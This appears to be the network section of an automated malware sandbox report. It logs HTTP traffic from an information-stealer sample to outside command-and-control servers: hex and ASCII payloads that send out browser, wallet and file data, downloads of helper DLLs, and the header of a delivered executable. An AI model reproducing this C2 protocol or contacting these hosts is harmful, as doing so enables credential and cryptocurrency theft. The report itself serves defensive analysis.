00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 26 Apr 2024 22:47:11 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Wed, 24 Apr 2024 21:15:46 GMTETag: "85400-616de2c892480"Accept-Ranges: bytesContent-Length: 545792Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 63 08 c4 c7 27 69 aa 94 27 69 aa 94 27 69 aa 94 93 f5 5b 94 37 69 aa 94 93 f5 59 94 a0 69 aa 94 93 f5 58 94 38 69 aa 94 1c 37 a9 95 33 69 aa 94 1c 37 af 95 14 69 aa 94 1c 37 ae 95 05 69 aa 94 2e 11 39 94 22 69 aa 94 27 69 ab 94 7d 69 aa 94 8d 37 a3 95 25 69 aa 94 8d 37 55 94 26 69 aa 94 27 69 3d 94 26 69 aa 94 8d 37 a8 95 26 69 aa 94 52 69 63 68 27 69 aa 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 82 76 29 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 b0 06 00 00 b4 01 00 00 00 00 00 b6 80 05 00 00 10 00 00 00 c0 06 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 b0 08 00 00 04 00 00 00 00 00 00 02 00 40 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 50 9c 07 00 28 00 00 00 00 f0 07 00 40 28 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 08 00 6c 80 00 00 b0 80 07 00 70 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 81 07 00 40 00 00 00 00 00 00 00 00 00 00 00 00 c0 06 00 1c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 31 af 06 00 00 10 00 00 00 b0 06 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 aa e2 00 00 00 c0 06 00 00 e4 00 00 00 b4 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 40 20 00 00 00 b0 07 00 00 0e 00 00 00 98 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 67 66 69 64 73 00 00 f8 01 00 00 00 e0 07 00 00 02 00 00 00 a6 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 40 28 00 00 00 f0 07 00 00 2a 00 00 00 a8 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 6c 80 00 00 00 20 08 00 00 82 00 00 00 d2 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HDGIJJDGCBKFIDHIEBKEHost: 185.172.128.76Content-Length: 216Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 48 44 47 49 4a 4a 44 47 43 42 4b 46 49 44 48 49 45 42 4b 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 33 44 45 41 35 39 44 31 37 39 41 41 31 31 30 36 36 35 34 35 34 36 0d 0a 2d 2d 2d 2d 2d 2d 48 44 47 49 4a 4a 44 47 43 42 4b 46 49 44 48 49 45 42 4b 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 65 66 61 75 6c 74 31 30 0d 0a 2d 2d 2d 2d 2d 2d 48 44 47 49 4a 4a 44 47 43 42 4b 46 49 44 48 49 45 42 4b 45 2d 2d 0d 0a Data Ascii: ------HDGIJJDGCBKFIDHIEBKEContent-Disposition: form-data; name="hwid"3DEA59D179AA1106654546------HDGIJJDGCBKFIDHIEBKEContent-Disposition: form-data; name="build"default10------HDGIJJDGCBKFIDHIEBKE--
Source: global traffic HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GHJEHJJDAAAKEBGCFCAAHost: 185.172.128.76Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 47 48 4a 45 48 4a 4a 44 41 41 41 4b 45 42 47 43 46 43 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 30 35 63 37 38 64 66 32 33 34 39 31 65 65 31 33 63 34 38 35 34 37 37 33 39 38 38 61 66 38 38 63 37 63 64 33 38 36 38 66 39 35 65 62 34 32 65 62 38 64 62 65 37 38 63 64 61 61 65 31 65 65 30 31 66 38 39 31 38 35 61 0d 0a 2d 2d 2d 2d 2d 2d 47 48 4a 45 48 4a 4a 44 41 41 41 4b 45 42 47 43 46 43 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 62 72 6f 77 73 65 72 73 0d 0a 2d 2d 2d 2d 2d 2d 47 48 4a 45 48 4a 4a 44 41 41 41 4b 45 42 47 43 46 43 41 41 2d 2d 0d 0a Data Ascii: ------GHJEHJJDAAAKEBGCFCAAContent-Disposition: form-data; name="token"005c78df23491ee13c4854773988af88c7cd3868f95eb42eb8dbe78cdaae1ee01f89185a------GHJEHJJDAAAKEBGCFCAAContent-Disposition: form-data; name="message"browsers------GHJEHJJDAAAKEBGCFCAA--
Source: global traffic HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JDGCGDBGCAAEBFIECGHDHost: 185.172.128.76Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4a 44 47 43 47 44 42 47 43 41 41 45 42 46 49 45 43 47 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 30 35 63 37 38 64 66 32 33 34 39 31 65 65 31 33 63 34 38 35 34 37 37 33 39 38 38 61 66 38 38 63 37 63 64 33 38 36 38 66 39 35 65 62 34 32 65 62 38 64 62 65 37 38 63 64 61 61 65 31 65 65 30 31 66 38 39 31 38 35 61 0d 0a 2d 2d 2d 2d 2d 2d 4a 44 47 43 47 44 42 47 43 41 41 45 42 46 49 45 43 47 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 4a 44 47 43 47 44 42 47 43 41 41 45 42 46 49 45 43 47 48 44 2d 2d 0d 0a Data Ascii: ------JDGCGDBGCAAEBFIECGHDContent-Disposition: form-data; name="token"005c78df23491ee13c4854773988af88c7cd3868f95eb42eb8dbe78cdaae1ee01f89185a------JDGCGDBGCAAEBFIECGHDContent-Disposition: form-data; name="message"plugins------JDGCGDBGCAAEBFIECGHD--
Source: global traffic HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AAAKEBGDAFHIIDHIIECFHost: 185.172.128.76Content-Length: 7655Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /15f649199f40275b/sqlite3.dll HTTP/1.1Host: 185.172.128.76Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HIDHIEGIIIECAKEBFBAAHost: 185.172.128.76Content-Length: 4599Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CFCFCAAAAFBAKEBFBAKKHost: 185.172.128.76Content-Length: 1451Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CFCFCAAAAFBAKEBFBAKKHost: 185.172.128.76Content-Length: 1451Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 43 46 43 46 43 41 41 41 41 46 42 41 4b 45 42 46 42 41 4b 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 30 35 63 37 38 64 66 32 33 34 39 31 65 65 31 33 63 34 38 35 34 37 37 33 39 38 38 61 66 38 38 63 37 63 64 33 38 36 38 66 39 35 65 62 34 32 65 62 38 64 62 65 37 38 63 64 61 61 65 31 65 65 30 31 66 38 39 31 38 35 61 0d 0a 2d 2d 2d 2d 2d 2d 43 46 43 46 43 41 41 41 41 46 42 41 4b 45 42 46 42 41 4b 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 61 47 6c 7a 64 47 39 79 65 56 78 48 62 32 39 6e 62 47 55 67 51 32 68 79 62 32 31 6c 58 30 52 6c 5a 6d 46 31 62 48 51 75 64 48 68 30 0d 0a 2d 2d 2d 2d 2d 2d 43 46 43 46 43 41 41 41 41 46 42 41 4b 45 42 46 42 41 4b 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 61 48 52 30 63 48 4d 36 4c 79 39 6e 62 79 35 74 61 57 4e 79 62 33 4e 76 5a 6e 51 75 59 32 39 74 4c 32 5a 33 62 47 6c 75 61 79 38 2f 54 47 6c 75 61 30 6c 6b 50 54 49 78 4d 44 59 79 4e 44 4d 4b 61 48 52 30 63 48 4d 36 4c 79 39 6e 62 79 35 74 61 57 4e 79 62 33 4e 76 5a 6e 51 75 59 32 39 74 4c 32 5a 33 62 47 6c 75 61 79 38 2f 62 47 6c 75 61 32 6c 6b 50 54 67 31 4d 54 55 30 4e 67 70 6f 64 48 52 77 63 7a 6f 76 4c 33 4e 31 63 48 42 76 63 6e 51 75 62 57 6c 6a 63 6d 39 7a 62 32 5a 30 4c 6d 4e 76 62 53 39 6c 62 69 31 31 63 79 39 76 5a 6d 5a 70 59 32 55 76 4e 32 51 30 4f 44 49 34 4e 57 49 74 4d 6a 42 6c 4f 43 30 30 59 6a 6c 69 4c 54 6b 78 59 57 51 74 4d 6a 45 32 5a 54 4d 30 4d 54 59 7a 59 6d 46 6b 50 33 64 30 4c 6d 31 6a 58 32 6c 6b 50 57 56 75 64 47 56 79 63 47 73 79 4d 44 45 32 4a 6e 56 70 50 57 56 75 4c 58 56 7a 4a 6e 4a 7a 50 57 56 75 4c 58 56 7a 4a 6d 46 6b 50 58 56 7a 43 6d 68 30 64 48 42 7a 4f 69 38 76 63 33 56 77 63 47 39 79 64 43 35 74 61 57 4e 79 62 33 4e 76 5a 6e 51 75 59 32 39 74 4c 32 56 75 4c 58 56 7a 4c 32 39 6d 5a 6d 6c 6a 5a 53 38 35 4e 47 4a 68 4d 6d 55 77 59 69 30 32 4d 7a 68 6c 4c 54 52 68 4f 54 49 74 4f 44 67 31 4e 79 30 79 59 32 49 31 59 57 4d 78 5a 44 68 6c 4d 54 63 2f 64 57 6b 39 5a 57 34 74 64 58 4d 6d 63 6e 4d 39 5a 57 34 74 64 58 4d 6d 59 57 51 39 64 58 4d 4b 61 48 52 30 63 48 4d 36 4c 79 39 7a 64 58 42 77 62 33 4a 30 4c 6d 31 70 59 33 4a 76 63 32 39 6d 64 43 35 6a 62 32 30 76 5a 57 34 74 64 58 4d 76 62 32 5a 6d 61 57 4e 6c 4c 32 56 34 59 57 31 77 62 47 56 7a 4c 57 39 6d 4c 57 39 6d 5a 6d 6c 6a 5a 53 31 77 63 6d 39 6b 64 57 4e 30 4c 57 74 6c 65 58 4d 74 4e 32 51 30 4f 44 49 34 4e 57 49 74 4d 6a 42 6c 4f 43 30 30 59 6a 6c 69 4c 54 6b 78 59 57 51 74 4d 6a 45 32 5a 54 4d 30 4d 54 59 7a 59 6d 46
Source: global traffic HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GHJEHJJDAAAKEBGCFCAAHost: 185.172.128.76Content-Length: 359Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 47 48 4a 45 48 4a 4a 44 41 41 41 4b 45 42 47 43 46 43 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 30 35 63 37 38 64 66 32 33 34 39 31 65 65 31 33 63 34 38 35 34 37 37 33 39 38 38 61 66 38 38 63 37 63 64 33 38 36 38 66 39 35 65 62 34 32 65 62 38 64 62 65 37 38 63 64 61 61 65 31 65 65 30 31 66 38 39 31 38 35 61 0d 0a 2d 2d 2d 2d 2d 2d 47 48 4a 45 48 4a 4a 44 41 41 41 4b 45 42 47 43 46 43 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 5a 58 49 30 61 44 52 6c 4f 48 49 30 4c 6d 5a 70 62 47 55 3d 0d 0a 2d 2d 2d 2d 2d 2d 47 48 4a 45 48 4a 4a 44 41 41 41 4b 45 42 47 43 46 43 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 47 48 4a 45 48 4a 4a 44 41 41 41 4b 45 42 47 43 46 43 41 41 2d 2d 0d 0a Data Ascii: ------GHJEHJJDAAAKEBGCFCAAContent-Disposition: form-data; name="token"005c78df23491ee13c4854773988af88c7cd3868f95eb42eb8dbe78cdaae1ee01f89185a------GHJEHJJDAAAKEBGCFCAAContent-Disposition: form-data; name="file_name"ZXI0aDRlOHI0LmZpbGU=------GHJEHJJDAAAKEBGCFCAAContent-Disposition: form-data; name="file"------GHJEHJJDAAAKEBGCFCAA--
Source: global traffic HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BGIJJKKJJDAAAAAKFHJJHost: 185.172.128.76Content-Length: 359Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 42 47 49 4a 4a 4b 4b 4a 4a 44 41 41 41 41 41 4b 46 48 4a 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 30 35 63 37 38 64 66 32 33 34 39 31 65 65 31 33 63 34 38 35 34 37 37 33 39 38 38 61 66 38 38 63 37 63 64 33 38 36 38 66 39 35 65 62 34 32 65 62 38 64 62 65 37 38 63 64 61 61 65 31 65 65 30 31 66 38 39 31 38 35 61 0d 0a 2d 2d 2d 2d 2d 2d 42 47 49 4a 4a 4b 4b 4a 4a 44 41 41 41 41 41 4b 46 48 4a 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 5a 58 49 30 61 44 52 6c 4f 48 49 30 4c 6d 5a 70 62 47 55 3d 0d 0a 2d 2d 2d 2d 2d 2d 42 47 49 4a 4a 4b 4b 4a 4a 44 41 41 41 41 41 4b 46 48 4a 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 42 47 49 4a 4a 4b 4b 4a 4a 44 41 41 41 41 41 4b 46 48 4a 4a 2d 2d 0d 0a Data Ascii: ------BGIJJKKJJDAAAAAKFHJJContent-Disposition: form-data; name="token"005c78df23491ee13c4854773988af88c7cd3868f95eb42eb8dbe78cdaae1ee01f89185a------BGIJJKKJJDAAAAAKFHJJContent-Disposition: form-data; name="file_name"ZXI0aDRlOHI0LmZpbGU=------BGIJJKKJJDAAAAAKFHJJContent-Disposition: form-data; name="file"------BGIJJKKJJDAAAAAKFHJJ--
Source: global traffic HTTP traffic detected: GET /15f649199f40275b/freebl3.dll HTTP/1.1Host: 185.172.128.76Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /15f649199f40275b/mozglue.dll HTTP/1.1Host: 185.172.128.76Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /15f649199f40275b/mozglue.dll HTTP/1.1Host: 185.172.128.76Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /15f649199f40275b/msvcp140.dll HTTP/1.1Host: 185.172.128.76Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /15f649199f40275b/nss3.dll HTTP/1.1Host: 185.172.128.76Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /15f649199f40275b/softokn3.dll HTTP/1.1Host: 185.172.128.76Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /15f649199f40275b/vcruntime140.dll HTTP/1.1Host: 185.172.128.76Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000
Source: global traffic HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HDGHJEBFBFHIIECAECGHHost: 185.172.128.76Content-Length: 1067Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EBGCBAFCGDAAKFIDGIEGHost: 185.172.128.76Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 45 42 47 43 42 41 46 43 47 44 41 41 4b 46 49 44 47 49 45 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 30 35 63 37 38 64 66 32 33 34 39 31 65 65 31 33 63 34 38 35 34 37 37 33 39 38 38 61 66 38 38 63 37 63 64 33 38 36 38 66 39 35 65 62 34 32 65 62 38 64 62 65 37 38 63 64 61 61 65 31 65 65 30 31 66 38 39 31 38 35 61 0d 0a 2d 2d 2d 2d 2d 2d 45 42 47 43 42 41 46 43 47 44 41 41 4b 46 49 44 47 49 45 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 61 6c 6c 65 74 73 0d 0a 2d 2d 2d 2d 2d 2d 45 42 47 43 42 41 46 43 47 44 41 41 4b 46 49 44 47 49 45 47 2d 2d 0d 0a Data Ascii: ------EBGCBAFCGDAAKFIDGIEGContent-Disposition: form-data; name="token"005c78df23491ee13c4854773988af88c7cd3868f95eb42eb8dbe78cdaae1ee01f89185a------EBGCBAFCGDAAKFIDGIEGContent-Disposition: form-data; name="message"wallets------EBGCBAFCGDAAKFIDGIEG--
Source: global traffic HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JEGHJDGIJECGDHJJECGHHost: 185.172.128.76Content-Length: 265Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4a 45 47 48 4a 44 47 49 4a 45 43 47 44 48 4a 4a 45 43 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 30 35 63 37 38 64 66 32 33 34 39 31 65 65 31 33 63 34 38 35 34 37 37 33 39 38 38 61 66 38 38 63 37 63 64 33 38 36 38 66 39 35 65 62 34 32 65 62 38 64 62 65 37 38 63 64 61 61 65 31 65 65 30 31 66 38 39 31 38 35 61 0d 0a 2d 2d 2d 2d 2d 2d 4a 45 47 48 4a 44 47 49 4a 45 43 47 44 48 4a 4a 45 43 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 69 6c 65 73 0d 0a 2d 2d 2d 2d 2d 2d 4a 45 47 48 4a 44 47 49 4a 45 43 47 44 48 4a 4a 45 43 47 48 2d 2d 0d 0a Data Ascii: ------JEGHJDGIJECGDHJJECGHContent-Disposition: form-data; name="token"005c78df23491ee13c4854773988af88c7cd3868f95eb42eb8dbe78cdaae1ee01f89185a------JEGHJDGIJECGDHJJECGHContent-Disposition: form-data; name="message"files------JEGHJDGIJECGDHJJECGH--
Source: global traffic HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EHDHDHIECGCAEBFIIDHIHost: 185.172.128.76Content-Length: 1759Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DBKFHJEBAAEBGDGDBFBGHost: 185.172.128.76Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FCGIJDBAFCBAAKECGDGCHost: 185.172.128.76Content-Length: 1759Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AKFHDBFIDAECAAAKEGDAHost: 185.172.128.76Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000
Source: global traffic HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HIIEGHJJDGHCAKEBGIJKHost: 185.172.128.76Content-Length: 1759Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GIJDAFBKFIECBGCAKECGHost: 185.172.128.76Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FCGIJDBAFCBAAKECGDGCHost: 185.172.128.76Content-Length: 1759Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EHDHDHIECGCAEBFIIDHIHost: 185.172.128.76Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HDBGHDHCGHCAAKEBKECBHost: 185.172.128.76Content-Length: 1759Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GHDAAKJEGCFCAKEBKJJEHost: 185.172.128.76Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
